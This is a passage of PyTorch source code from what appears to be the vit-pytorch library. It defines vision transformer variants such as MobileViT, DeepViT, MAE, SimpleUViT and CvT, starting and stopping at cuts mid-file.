Paper: https://arxiv.org/abs/2010.11929 Based on: https://github.com/lucidrains/vit-pytorch """ def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout=0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads, dim_head, dropout), FeedForward(dim, mlp_dim, dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class MV2Block(nn.Module): """MV2 block described in MobileNetV2. Paper: https://arxiv.org/pdf/1801.04381 Based on: https://github.com/tonylins/pytorch-mobilenet-v2 """ def __init__(self, inp, oup, stride=1, expansion=4): super().__init__() self.stride = stride assert stride in [1, 2] hidden_dim = int(inp * expansion) self.use_res_connect = self.stride == 1 and inp == oup if expansion == 1: self.conv = nn.Sequential( # dw nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim), nn.SiLU(), # pw-linear nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), ) else: self.conv = nn.Sequential( # pw nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False), nn.BatchNorm2d(hidden_dim), nn.SiLU(), # dw nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim), nn.SiLU(), # pw-linear nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), ) def forward(self, x): out = self.conv(x) if self.use_res_connect: out = out + x return out class MobileViTBlock(nn.Module): def __init__(self, dim, depth, channel, kernel_size, patch_size, mlp_dim, dropout=0.): super().__init__() self.ph, self.pw = patch_size self.conv1 = conv_nxn_bn(channel, channel, kernel_size) self.conv2 = conv_1x1_bn(channel, dim) self.transformer = Transformer(dim, depth, 4, 8, mlp_dim, dropout) self.conv3 = conv_1x1_bn(dim, channel) self.conv4 = conv_nxn_bn(2 * channel, channel, kernel_size) def forward(self, x): y = x.clone() # Local representations x = self.conv1(x) x = self.conv2(x) # Global representations _, _, h, w = x.shape x = rearrange(x, 'b d (h ph) (w pw) -> b (ph pw) (h w) d', ph=self.ph, pw=self.pw) x = self.transformer(x) x = rearrange(x, 'b (ph pw) (h w) d -> b d (h ph) (w pw)', h=h//self.ph, w=w//self.pw, ph=self.ph, pw=self.pw) # Fusion x = self.conv3(x) x = torch.cat((x, y), 1) x = self.conv4(x) return x class MobileViT(nn.Module): """MobileViT. Paper: https://arxiv.org/abs/2110.02178 Based on: https://github.com/chinhsuanwu/mobilevit-pytorch """ def __init__( self, image_size, dims, channels, num_classes, expansion=4, kernel_size=3, patch_size=(2, 2), depths=(2, 4, 3) ): super().__init__() assert len(dims) == 3, 'dims must be a tuple of 3' assert len(depths) == 3, 'depths must be a tuple of 3' ih, iw = image_size ph, pw = patch_size assert ih % ph == 0 and iw % pw == 0 init_dim, *_, last_dim = channels self.conv1 = conv_nxn_bn(3, init_dim, stride=2) self.stem = nn.ModuleList([]) self.stem.append(MV2Block(channels[0], channels[1], 1, expansion)) self.stem.append(MV2Block(channels[1], channels[2], 2, expansion)) self.stem.append(MV2Block(channels[2], channels[3], 1, expansion)) self.stem.append(MV2Block(channels[2], channels[3], 1, expansion)) self.trunk = nn.ModuleList([]) self.trunk.append(nn.ModuleList([ MV2Block(channels[3], channels[4], 2, expansion), MobileViTBlock(dims[0], depths[0], channels[5], kernel_size, patch_size, int(dims[0] * 2)) ])) self.trunk.append(nn.ModuleList([ MV2Block(channels[5], channels[6], 2, expansion), MobileViTBlock(dims[1], depths[1], channels[7], kernel_size, patch_size, int(dims[1] * 4)) ])) self.trunk.append(nn.ModuleList([ MV2Block(channels[7], channels[8], 2, expansion), MobileViTBlock(dims[2], depths[2], channels[9], kernel_size, patch_size, int(dims[2] * 4)) ])) self.to_logits = nn.Sequential( conv_1x1_bn(channels[-2], last_dim), Reduce('b c h w -> b c', 'mean'), nn.Linear(channels[-1], num_classes, bias=False) ) def forward(self, x): x = self.conv1(x) for conv in self.stem: x = conv(x) for conv, attn in self.trunk: x = conv(x) x = attn(x) return self.to_logits(x) File: vit_pytorch/deepvit.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.dropout = nn.Dropout(dropout) self.reattn_weights = nn.Parameter(torch.randn(heads, heads)) self.reattn_norm = nn.Sequential( Rearrange('b h i j -> b i j h'), nn.LayerNorm(heads), Rearrange('b i j h -> b h i j') ) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): b, n, _, h = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) # attention dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = dots.softmax(dim=-1) attn = self.dropout(attn) # re-attention attn = einsum('b h i j, h g -> b g i j', attn, self.reattn_weights) attn = self.reattn_norm(attn) # aggregate and out out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') out = self.to_out(out) return out class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class DeepViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/efficient.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange def pair(t): return t if isinstance(t, tuple) else (t, t) class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, transformer, pool = 'cls', channels = 3): super().__init__() image_size_h, image_size_w = pair(image_size) assert image_size_h % patch_size == 0 and image_size_w % patch_size == 0, 'image dimensions must be divisible by the patch size' assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' num_patches = (image_size_h // patch_size) * (image_size_w // patch_size) patch_dim = channels * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.transformer = transformer self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/simple_flash_attn_vit_3d.py from packaging import version from collections import namedtuple import torch from torch import nn import torch.nn.functional as F from torch.nn import Module, ModuleList from einops import rearrange from einops.layers.torch import Rearrange # constants Config = namedtuple('FlashAttentionConfig', ['enable_flash', 'enable_math', 'enable_mem_efficient']) # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_3d(patches, temperature = 10000, dtype = torch.float32): _, f, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype z, y, x = torch.meshgrid( torch.arange(f, device = device), torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') fourier_dim = dim // 6 omega = torch.arange(fourier_dim, device = device) / (fourier_dim - 1) omega = 1. / (temperature ** omega) z = z.flatten()[:, None] * omega[None, :] y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos(), z.sin(), z.cos()), dim = 1) pe = F.pad(pe, (0, dim - (fourier_dim * 6))) # pad if feature dimension not cleanly divisible by 6 return pe.type(dtype) # main class class Attend(Module): def __init__(self, use_flash = False, config: Config = Config(True, True, True)): super().__init__() self.config = config self.use_flash = use_flash assert not (use_flash and version.parse(torch.__version__) < version.parse('2.0.0')), 'in order to use flash attention, you must be using pytorch 2.0 or above' def flash_attn(self, q, k, v): # flash attention - https://arxiv.org/abs/2205.14135 with torch.backends.cuda.sdp_kernel(**self.config._asdict()): out = F.scaled_dot_product_attention(q, k, v) return out def forward(self, q, k, v): n, device, scale = q.shape[-2], q.device, q.shape[-1] ** -0.5 if self.use_flash: return self.flash_attn(q, k, v) # similarity sim = einsum("b h i d, b j d -> b h i j", q, k) * scale # attention attn = sim.softmax(dim=-1) # aggregate values out = einsum("b h i j, b j d -> b h i d", attn, v) return out # classes class FeedForward(Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, use_flash = True): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = Attend(use_flash = use_flash) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) out = self.attend(q, k, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, use_flash): super().__init__() self.layers = ModuleList([]) for _ in range(depth): self.layers.append(ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, use_flash = use_flash), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class SimpleViT(Module): def __init__(self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, use_flash_attn = True): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert frames % frame_patch_size == 0, 'Frames must be divisible by the frame patch size' num_patches = (image_height // patch_height) * (image_width // patch_width) * (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b f h w (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, use_flash_attn) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, video): *_, h, w, dtype = *video.shape, video.dtype x = self.to_patch_embedding(video) pe = posemb_sincos_3d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/mae.py import torch from torch import nn import torch.nn.functional as F from einops import repeat from vit_pytorch.vit import Transformer class MAE(nn.Module): def __init__( self, *, encoder, decoder_dim, masking_ratio = 0.75, decoder_depth = 1, decoder_heads = 8, decoder_dim_head = 64 ): super().__init__() assert masking_ratio > 0 and masking_ratio < 1, 'masking ratio must be kept between 0 and 1' self.masking_ratio = masking_ratio # extract some hyperparameters and functions from encoder (vision transformer to be trained) self.encoder = encoder num_patches, encoder_dim = encoder.pos_embedding.shape[-2:] self.to_patch = encoder.to_patch_embedding[0] self.patch_to_emb = nn.Sequential(*encoder.to_patch_embedding[1:]) pixel_values_per_patch = encoder.to_patch_embedding[2].weight.shape[-1] # decoder parameters self.decoder_dim = decoder_dim self.enc_to_dec = nn.Linear(encoder_dim, decoder_dim) if encoder_dim != decoder_dim else nn.Identity() self.mask_token = nn.Parameter(torch.randn(decoder_dim)) self.decoder = Transformer(dim = decoder_dim, depth = decoder_depth, heads = decoder_heads, dim_head = decoder_dim_head, mlp_dim = decoder_dim * 4) self.decoder_pos_emb = nn.Embedding(num_patches, decoder_dim) self.to_pixels = nn.Linear(decoder_dim, pixel_values_per_patch) def forward(self, img): device = img.device # get patches patches = self.to_patch(img) batch, num_patches, *_ = patches.shape # patch to encoder tokens and add positions tokens = self.patch_to_emb(patches) if self.encoder.pool == "cls": tokens += self.encoder.pos_embedding[:, 1:(num_patches + 1)] elif self.encoder.pool == "mean": tokens += self.encoder.pos_embedding.to(device, dtype=tokens.dtype) # calculate of patches needed to be masked, and get random indices, dividing it up for mask vs unmasked num_masked = int(self.masking_ratio * num_patches) rand_indices = torch.rand(batch, num_patches, device = device).argsort(dim = -1) masked_indices, unmasked_indices = rand_indices[:, :num_masked], rand_indices[:, num_masked:] # get the unmasked tokens to be encoded batch_range = torch.arange(batch, device = device)[:, None] tokens = tokens[batch_range, unmasked_indices] # get the patches to be masked for the final reconstruction loss masked_patches = patches[batch_range, masked_indices] # attend with vision transformer encoded_tokens = self.encoder.transformer(tokens) # project encoder to decoder dimensions, if they are not equal - the paper says you can get away with a smaller dimension for decoder decoder_tokens = self.enc_to_dec(encoded_tokens) # reapply decoder position embedding to unmasked tokens unmasked_decoder_tokens = decoder_tokens + self.decoder_pos_emb(unmasked_indices) # repeat mask tokens for number of masked, and add the positions using the masked indices derived above mask_tokens = repeat(self.mask_token, 'd -> b n d', b = batch, n = num_masked) mask_tokens = mask_tokens + self.decoder_pos_emb(masked_indices) # concat the masked tokens to the decoder tokens and attend with decoder decoder_tokens = torch.zeros(batch, num_patches, self.decoder_dim, device=device) decoder_tokens[batch_range, unmasked_indices] = unmasked_decoder_tokens decoder_tokens[batch_range, masked_indices] = mask_tokens decoded_tokens = self.decoder(decoder_tokens) # splice out the mask tokens and project to pixel values mask_tokens = decoded_tokens[batch_range, masked_indices] pred_pixel_values = self.to_pixels(mask_tokens) # calculate reconstruction loss recon_loss = F.mse_loss(pred_pixel_values, masked_patches) return recon_loss File: vit_pytorch/simple_uvit.py import torch from torch import nn from torch.nn import Module, ModuleList from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def exists(v): return v is not None def divisible_by(num, den): return (num % den) == 0 def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert divisible_by(dim, 4), "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = temperature ** -omega y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes def FeedForward(dim, hidden_dim): return nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.depth = depth self.norm = nn.LayerNorm(dim) self.layers = ModuleList([]) for layer in range(1, depth + 1): latter_half = layer >= (depth / 2 + 1) self.layers.append(nn.ModuleList([ nn.Linear(dim * 2, dim) if latter_half else None, Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): skips = [] for ind, (combine_skip, attn, ff) in enumerate(self.layers): layer = ind + 1 first_half = layer <= (self.depth / 2) if first_half: skips.append(x) if exists(combine_skip): skip = skips.pop() skip_and_x = torch.cat((skip, x), dim = -1) x = combine_skip(skip_and_x) x = attn(x) + x x = ff(x) + x assert len(skips) == 0 return self.norm(x) class SimpleUViT(Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, num_register_tokens = 4, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert divisible_by(image_height, patch_height) and divisible_by(image_width, patch_width), 'Image dimensions must be divisible by the patch size.' patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim ) self.register_buffer('pos_embedding', pos_embedding, persistent = False) self.register_tokens = nn.Parameter(torch.randn(num_register_tokens, dim)) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): batch, device = img.shape[0], img.device x = self.to_patch_embedding(img) x = x + self.pos_embedding.type(x.dtype) r = repeat(self.register_tokens, 'n d -> b n d', b = batch) x, ps = pack([x, r], 'b * d') x = self.transformer(x) x, _ = unpack(x, ps, 'b * d') x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) # quick test on odd number of layers if __name__ == '__main__': v = SimpleUViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 7, heads = 16, mlp_dim = 2048 ).cuda() img = torch.randn(2, 3, 256, 256).cuda() preds = v(img) assert preds.shape == (2, 1000) File: vit_pytorch/cvt.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helper methods def group_dict_by_key(cond, d): return_val = [dict(), dict()] for key in d.keys(): match = bool(cond(key)) ind = int(not match) return_val[ind][key] = d[key] return (*return_val,) def group_by_key_prefix_and_remove_prefix(prefix, d): kwargs_with_prefix, kwargs = group_dict_by_key(lambda x: x.startswith(prefix), d) kwargs_without_prefix = dict(map(lambda x: (x[0][len(prefix):], x[1]), tuple(kwargs_with_prefix.items()))) return kwargs_without_prefix, kwargs # classes class LayerNorm(nn.Module): # layernorm, but done in the channel dimension #1 def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() self.net = nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_in, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.BatchNorm2d(dim_in), nn.Conv2d(dim_in, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, proj_kernel, kv_proj_stride, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads padding = proj_kernel // 2 self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = DepthWiseConv2d(dim, inner_dim, proj_kernel, padding = padding, stride = 1, bias = False) self.to_kv = DepthWiseConv2d(dim, inner_dim * 2, proj_kernel, padding = padding, stride = kv_proj_stride, bias = False) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): shape = x.shape b, n, _, y, h = *shape, self.heads x = self.norm(x) q, k, v = (self.to_q(x), *self.to_kv(x).chunk(2, dim = 1)) q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> (b h) (x y) d', h = h), (q, k, v)) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b h) (x y) d -> b (h d) x y', h = h, y = y) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, proj_kernel, kv_proj_stride, depth, heads, dim_head = 64, mlp_mult = 4, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, proj_kernel = proj_kernel, kv_proj_stride = kv_proj_stride, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_mult, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class CvT(nn.Module): def __init__( self, *, num_classes, s1_emb_dim = 64, s1_emb_kernel = 7, s1_emb_stride = 4, s1_proj_kernel = 3, s1_kv_proj_stride = 2, s1_heads = 1, s1_depth = 1, s1_mlp_mult = 4, s2_emb_dim = 192, s2_emb_kernel = 3, s2_emb_stride = 2, s2_proj_kernel = 3, s2_kv_proj_stride = 2, s2_heads = 3, s2_depth = 2, s2_mlp_mult = 4, s3_emb_dim = 384, s3_emb_kernel = 3, s3_emb_stride = 2, s3_proj_kernel = 3, s3_kv_proj_stride = 2, s3_heads = 6, s3_depth = 10, s3_mlp_mult = 4, dropout = 0., channels = 3 ): super().__init__() kwargs = dict(locals()) dim = channels layers = [] for prefix in ('s1', 's2', 's3'): config, kwargs = group_by_key_prefix_and_remove_prefix(f'{prefix}_', kwargs) layers.append(nn.Sequential( nn.Conv2d(dim, config['emb_dim'], kernel_size = config['emb_kernel'], padding = (config['emb_kernel'] // 2), stride = config['emb_stride']), LayerNorm(config['emb_dim']), Transformer(dim = config['emb_dim'], proj_kernel = config['proj_kernel'], kv_proj_stride = config['kv_proj_stride'], depth = config['depth'], heads = config['heads'], mlp_mult = config['mlp_mult'], dropout = dropout) )) dim = config['emb_dim'] self.layers = nn.Sequential(*layers) self.to_logits = nn.Sequential( nn.AdaptiveAvgPool2d(1), Rearrange('... () () -> ...'), nn.Linear(dim, num_classes) ) def forward(self, x): latents = self.layers(x) return self.to_logits(latents) File: vit_pytorch/simple_vit_with_qk_norm.py import torch from torch import nn import torch.nn.functional as F from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # they use a query-key normalization that is equivalent to rms norm (no mean-centering, learned gamma), from vit 22B paper # in latest tweet, seem to claim more stable training at higher learning rates # unsure if this has taken off within Brain, or it has some hidden drawback class RMSNorm(nn.Module): def __init__(self, heads, dim): super().__init__() self.scale = dim ** 0.5 self.gamma = nn.Parameter(torch.ones(heads, 1, dim) / self.scale) def forward(self, x): normed = F.normalize(x, dim = -1) return normed * self.scale * self.gamma # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.q_norm = RMSNorm(heads, dim_head) self.k_norm = RMSNorm(heads, dim_head) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = self.q_norm(q) k = self.k_norm(k) dots = torch.matmul(q, k.transpose(-1, -2)) attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.LayerNorm(dim) def forward(self, img): device = img.device x = self.to_patch_embedding(img) x += self.pos_embedding.to(device, dtype=x.dtype) x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/twins_svt.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helper methods def group_dict_by_key(cond, d): return_val = [dict(), dict()] for key in d.keys(): match = bool(cond(key)) ind = int(not match) return_val[ind][key] = d[key] return (*return_val,) def group_by_key_prefix_and_remove_prefix(prefix, d): kwargs_with_prefix, kwargs = group_dict_by_key(lambda x: x.startswith(prefix), d) kwargs_without_prefix = dict(map(lambda x: (x[0][len(prefix):], x[1]), tuple(kwargs_with_prefix.items()))) return kwargs_without_prefix, kwargs # classes class Residual(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, **kwargs): return self.fn(x, **kwargs) + x class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() self.net = nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mult, 